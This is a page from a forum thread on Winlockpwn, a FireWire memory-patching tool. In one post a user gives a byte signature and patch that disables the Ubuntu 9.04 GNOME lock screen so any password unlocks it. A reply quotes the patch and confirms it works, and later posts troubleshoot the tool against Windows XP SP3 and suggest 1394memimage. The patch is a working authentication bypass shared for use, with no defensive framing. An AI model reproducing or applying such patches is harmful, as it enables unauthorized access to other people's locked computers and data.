Page 5 of 5 FirstFirst ... 345
Results 41 to 46 of 46

Thread: Tutorial Winlockpwn

  1. #41
    MFighter
    Guest

    Arrow ubuntu 9.04 32bit gnome code

    was trying out winlockpwn and made this tiny hack and thought I'd share it.
    works on 32bit ubuntu with gnome only (9.04 - jaunty). any password will work.
    Code:
    {"name":"Ubuntu 9.04 gnome 32bit lockscreen unlock",
    		 "notes":"Disable Ubuntu 9.04 32bit Lockscreen",
    		 "phase":[
    		 {"name":"Patch code",
    		 "sig":"E8CC61000085C00F85E4000000C74424100E460508C744240C14460508C744240827010000C74424042D",
    		 "pageoffset":[0xD3F],
    		 "patch":"B80100000085",
    		 "patchoffset":0x0}
    		 ]
    		}
    cheers,
    - mf

  2. #42
    Good friend of the forums williamc's Avatar
    Join Date
    Feb 2010
    Location
    Chico CA
    Posts
    285

    Default

    Nice. I'm looking forward to trying this out! I contacted the original author about having it released with BT4, but so far no reply.

    William

  3. #43
    Just burned his ISO
    Join Date
    Jun 2008
    Posts
    4

    Default

    Quote Originally Posted by MFighter View Post
    was trying out winlockpwn and made this tiny hack and thought I'd share it.
    works on 32bit ubuntu with gnome only (9.04 - jaunty). any password will work.
    Code:
    {"name":"Ubuntu 9.04 gnome 32bit lockscreen unlock",
    		 "notes":"Disable Ubuntu 9.04 32bit Lockscreen",
    		 "phase":[
    		 {"name":"Patch code",
    		 "sig":"E8CC61000085C00F85E4000000C74424100E460508C744240C14460508C744240827010000C74424042D",
    		 "pageoffset":[0xD3F],
    		 "patch":"B80100000085",
    		 "patchoffset":0x0}
    		 ]
    		}
    cheers,
    - mf
    I can confirm that it works! nice work!

  4. #44
    Just burned his ISO
    Join Date
    Jan 2009
    Posts
    1

    Default Updates?

    For some reason it won't work that flawles on all win systems right now. I tried so far 4 XP SP3 machines - only one worked after many tries. A year ago or so everything worked very well but now it's pretty unstable. I got Ressource temporarily unavailable all the time...

    1394memimage works, however, well

    BTW current the free Helix 3 has everything on board and is the most stable solution for me...

  5. #45
    Just burned his ISO
    Join Date
    Jan 2010
    Posts
    1

    Default

    I have the same "Makefile" and get the same result with you .I have read the next reply and
    " I am at the point where i have to reference /usr/local/include/python2.5 in the other scripts " but I still get the same result.

    what is wrong?
    Thanks in Advance

  6. #46
    Good friend of the forums williamc's Avatar
    Join Date
    Feb 2010
    Location
    Chico CA
    Posts
    285

    Default

    Latidude: I've been experiencing the same issues with the tool. I believe Microsoft may have patched this issue over the course of the last year. By patched I mean moved the memory location, as they did with SP3. Additionally, the "resource unavailable" has been a lot more frequent. I found running the tool immediately after plugging in the firewire has the best chance of working.

    joimson: You need to give me more to work with. What version of BT are you running? Did you install python 2.5? Did you follow my instructions on page 1?

Page 5 of 5 FirstFirst ... 345

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •